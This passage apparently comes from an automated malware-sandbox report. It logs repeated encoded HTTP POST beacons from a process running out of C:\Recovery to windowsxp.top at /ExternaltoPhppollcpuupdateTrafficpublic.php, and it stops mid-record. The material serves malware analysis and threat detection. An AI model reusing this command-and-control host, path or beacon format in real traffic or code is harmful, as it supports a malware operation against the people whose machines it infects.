                                                                                                                  Data Ascii: UTXZ[XVWTXWTTT[\Y\[PRPRYT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'Y&X,_5*&!(\.%8;X'> #"<84**_,/!Y##X('
                                                                                                                  Oct 27, 2024 19:23:56.062069893 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:56.272614956 CET774INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:56 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HLzB6%2FLg0%2Fth1GUyStNS8Z7kqkIpRfBTFW5AqybwdrTHT8Aiwwincb%2B6sFCZ5rl4OAS1UqKqcFSq%2FpL00GG4jW4wWQnZJlin59B8aNq16JTnJxKI4C1FwOM4IFrnOflJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b8570e3a6c79-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1187&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1256944&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  81192.168.2.450094188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:56.171577930 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1716
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:56.526910067 CET1716OUTData Raw: 55 55 58 5b 5e 5a 56 53 54 58 57 54 54 56 5b 5d 59 51 5b 51 52 5e 52 52 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UUX[^ZVSTXWTTV[]YQ[QR^RRT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$&X#6:)"[9$(\08$T8,=< P#2(/>+^?<:!Y##X(/
                                                                                                                  Oct 27, 2024 19:23:56.784327984 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:56.992614031 CET923INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:56 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AANsrmhwE2j%2F4W7N5smxWKImGnQWUHmubW03Bva2H09RpkmjYd5rMxGcSED7Leny6x9uV0m8k9e4%2Fw1tzqgQdaDpa15q3OO1D%2Fnw7Fj7N%2FcuERvBgAwfS9oZVVLtIBOZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b85b88cc2ccb-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1330&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2037&delivery_rate=1114703&cwnd=113&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1a 22 17 20 3e 06 1f 29 12 3d 1c 3e 1f 21 5e 24 2c 0c 04 38 32 2f 00 29 13 3d 1d 2f 28 08 54 27 0a 21 45 3c 3a 3c 5a 20 10 05 0d 29 1f 21 5e 00 1c 27 19 21 10 29 14 25 2b 23 07 30 30 28 5c 35 13 33 15 2a 3e 21 1f 3f 5f 38 5a 28 06 20 08 2c 3f 0b 54 26 00 3d 00 38 28 0f 06 3c 2a 2a 54 0c 14 21 5b 2d 2c 3c 59 35 57 22 0a 3d 0b 2b 04 30 3e 01 09 27 3a 23 0f 3f 3c 06 06 3c 2d 21 1f 21 12 24 5a 2a 28 26 5f 25 3d 05 13 29 14 22 54 22 0e 29 53 0f 30 59 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98" >)=>!^$,82/)=/(T'!E<:<Z )!^'!)%+#00(\53*>!?_8Z( ,?T&=8(<**T![-,<Y5W"=+0>':#?<<-!!$Z*(&_%=)"T")S0YP0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  82192.168.2.450095188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:56.421049118 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:56.774324894 CET1012OUTData Raw: 55 56 58 5b 5e 5e 56 55 54 58 57 54 54 5d 5b 5c 59 51 5b 5b 52 5f 52 52 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UVX[^^VUTXWTT][\YQ[[R_RRT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY']2>^"95 Z97$<P/ S=/7 (8*<:_9/!Y##X(
                                                                                                                  Oct 27, 2024 19:23:57.016601086 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:57.338340998 CET772INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:57 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YqgRH0ry7hiZHhIJ5bDDxgiBYS9fhtGfdYwekSLvOs4YBG2HJf0Q9%2FwvpKXu5BW1RTD2sjpiJH7N9pLcMCpmkQezik8%2BhM%2FaoWATh3QnnEgsPACyNRY7KqS7VNz6WwFl"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b85cf806e81f-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1148&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1300988&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  83192.168.2.450096188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:57.469248056 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:57.825076103 CET1012OUTData Raw: 50 50 58 55 5e 5b 56 56 54 58 57 54 54 51 5b 5e 59 5f 5b 5e 52 56 52 52 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PPXU^[VVTXWTTQ[^Y_[^RVRRT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'Z2>(^5)]66$,$ $(/.(W*<;7!</Y?<9.!Y##X(3
                                                                                                                  Oct 27, 2024 19:23:58.295233011 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:58.502199888 CET779INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:58 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6QL1q1eFSYp%2Bb5zm63jCQu%2BcY%2BaUOdSp%2BJtr4b9oUbqXHYPixA%2Bzzd6foLYs%2BATa0BGPSbh1PzXgHXFVuY9zgpqILwn7LrC7q2az%2BaoEdHNR5jqxllCRLKTS1aoeE4lh"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b864fd3745fc-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1619&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=863446&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  84192.168.2.450097188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:58.648310900 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:58.998785019 CET1012OUTData Raw: 55 55 5d 5b 5e 5a 53 50 54 58 57 54 54 5d 5b 5f 59 5a 5b 5d 52 51 52 58 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UU][^ZSPTXWTT][_YZ[]RQRXT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'\1>35))X!P$]-'8V;7><<V"1/-=3Z=!./!Y##X(
                                                                                                                  Oct 27, 2024 19:23:59.262715101 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:59.456310987 CET776INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:59 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vxaw4y8IST0JHDiWx%2FAQ1h06XmSMjyr%2FdkwgmytiATYAZvKaua%2F%2BeSIEhRrPwhEFEi9gW0jOne5hQk3SOOM3NFwy2LGp1ADHfDaTfv95hZ4RSS3agjswXi9HTFL%2BXka2"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b86affa8e922-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1368&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1019000&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  85192.168.2.450098188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:00.707062006 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1000
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:01.055872917 CET1000OUTData Raw: 50 56 5d 5b 5b 5e 56 50 54 58 57 54 54 55 5b 5a 59 5d 5b 5f 52 52 52 5c 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PV][[^VPTXWTTU[ZY][_RRR\T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'[%> :"&7- X33-=$(<+4;^/=^>?6Y:!Y##X(7
                                                                                                                  Oct 27, 2024 19:24:01.318418980 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:01.514388084 CET776INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:01 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X%2BvW%2B7ElRey9Xlq8CWnsJ1KZYejACV3bvuKNvfXS7zj4U0UtBwcb%2FalQVQgiSpiysaA2edSC9FOHJBt9J8TnjNfSMqF%2B%2BmkCwhizEhqJ2VUKB39mO4n%2F5Ub%2BfXaRJ%2Fyk"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b877d82c4762-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1790&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1321&delivery_rate=822260&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a
                                                                                                                  Data Ascii: 41R[P
                                                                                                                  Oct 27, 2024 19:24:01.514415979 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  86192.168.2.450099188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:01.647578955 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:02.007833004 CET1012OUTData Raw: 50 52 5d 5e 5e 53 56 5f 54 58 57 54 54 50 5b 52 59 5b 5b 50 52 51 52 5a 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PR]^^SV_TXWTTP[RY[[PRQRZT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'Z&><6\=!&,\:03 W8-#=<"!'/7_)Z6.!Y##X(7
                                                                                                                  Oct 27, 2024 19:24:02.248322010 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:02.444952011 CET769INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:02 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y8LMQziq7ODrhtcQovcWCQSTuLqLDX3saeWNGKUmKZ2LxAEtbsklT3NZDZut4r4vLOUxGWoDbSDVQlAIf%2BKH1fA1FNxRYV3eY%2F2WGJzTxfUdLlo5833ERodZxFR8J93h"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b87dae2bb792-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1138&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1270175&cwnd=85&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  87192.168.2.450100188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:02.015734911 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1716
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:02.431111097 CET1716OUTData Raw: 50 57 58 5d 5e 5a 56 50 54 58 57 54 54 57 5b 5d 59 50 5b 51 52 56 52 58 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PWX]^ZVPTXWTTW[]YP[QRVRXT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$'.? )*!%#.$_$+';7)""<,-8>=:!Y##X(+
                                                                                                                  Oct 27, 2024 19:24:02.610447884 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:02.826740026 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:02.919061899 CET922INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:02 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7ZhwTGt7No6wZmMQvJxUAPRYlqQyOCtwm4gKp2X%2FqVZzc44PevKWXxIpLH6yoyl9k3Jv2tP6RVi57RmPFOqSzd6NJqhbHZdlHs%2FGxvOdH9i1YEnwFK1%2FQ%2FNXl2n5ILTy"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b87febfc4648-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1092&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2037&delivery_rate=1367327&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1a 22 5e 22 3e 24 56 2a 2f 32 08 3d 31 0b 5e 33 02 0b 11 3b 0c 02 5a 29 03 36 0f 2d 06 2a 54 30 0a 03 0b 2b 17 30 13 20 00 27 0b 3d 1f 21 5e 00 1c 24 04 21 2d 39 53 26 02 30 5b 30 09 3c 17 21 13 3f 5c 3d 10 2e 0c 3c 39 2c 5e 3f 28 38 0b 2f 11 03 55 26 2a 3e 1c 2c 16 2e 5e 3f 3a 2a 54 0c 14 21 12 2e 2f 1d 01 21 1f 3d 1f 28 21 3b 00 30 00 0e 50 27 03 2b 0b 28 02 2f 5e 3f 3e 35 5b 36 3f 20 58 2a 28 08 14 33 03 2f 1e 2a 04 22 54 22 0e 29 53 0f 30 59 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"^">$V*/2=1^3;Z)6-*T0+0 '=!^$!-9S&0[0<!?\=.<9,^?(8/U&*>,.^?:*T!./!=(!;0P'+(/^?>5[6? X*(3/*"T")S0YP0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  88192.168.2.450101188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:03.114780903 CET345OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Oct 27, 2024 19:24:03.462227106 CET1012OUTData Raw: 50 55 58 5b 5e 52 53 54 54 58 57 54 54 5d 5b 5d 59 5b 5b 58 52 5e 52 53 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PUX[^RSTTXWTT][]Y[[XR^RST\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'X%=759&55<:$%+<-.$>Y8#8/[8>>^-!Y##X(
                                                                                                                  Oct 27, 2024 19:24:03.709556103 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:03.913897038 CET774INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:03 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iOQA5Nr%2BRNOUeMyccaJ9Hxxy6ynraWyl0s2LkyoP3yTlsYJAM6i0y3d%2BIQ4em6Bx%2FE0shqCsaUk399Vd52uFORVl4DiUZnHdIy0Zx2MFNAjlNknuiYZjDPLyyWlWC%2F53"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b886ca9b6c7a-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1157&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1357&delivery_rate=1311594&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  89192.168.2.450102188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
